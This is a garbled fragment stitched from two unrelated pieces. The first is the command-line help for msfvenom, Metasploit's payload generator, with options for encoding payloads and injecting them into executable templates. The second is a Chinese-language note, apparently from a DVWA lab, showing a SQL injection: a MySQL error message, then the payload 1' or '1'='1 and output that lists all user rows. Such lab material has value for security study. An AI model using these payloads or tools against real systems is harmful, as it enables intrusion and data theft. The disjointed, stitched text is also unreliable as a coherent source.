MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /opt/metasploit/apps/pro/msf3/msfvenom [options] <var=val> Options: -p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads --payload-options List the payload's standard options -l, --list [type] List a module type. Options are: payloads, encoders, nops, all -n, --nopsled <length> Prepend a nopsled of [length] size on to the payload -f, --format <format> Output format (use --help-formats for a list) --help-formats List available formats -e, --encoder <encoder> The encoder to use -a, --arch <arch> The architecture to use --platform <platform> The platform of the payload -s, --space <length> The maximum size of the resulting payload --encoder-space <length> The maximum size of the encoded payload (defaults to the -s value) -b, --bad-chars <list> The list of characters to avoid example: '\x00\xff' -i, --iterations <count> The number of times to encode the payload -c, --add-code <path> Specify an additional win32 shellcode file to include -x, --template <path> Specify a custom executable file to use as a template -k, --keep Preserve the template behavior and inject the payload as a new thread -o, --out <path> Save the payload -v, --var-name <name> Specify a custom variable name to use for certain output formats --smallest Generate the smallest possible payload -h, --help Show this message
输入后报错You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘1234’’ at line 1 (看样子因该是被过路掉了恶意攻击) 接下来是1’ or ‘1’=’1,这是一个简单的boolean-based盲注,看看是否能绕过过滤然后成了:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
ID: 1' or '1'='1 First name: admin Surname: admin ID: 1' or '1'='1 First name: Gordon Surname: Brown ID: 1' or '1'='1 First name: Hack Surname: Me ID: 1' or '1'='1 First name: Pablo Surname: Picasso ID: 1' or '1'='1 First name: Bob Surname: Smith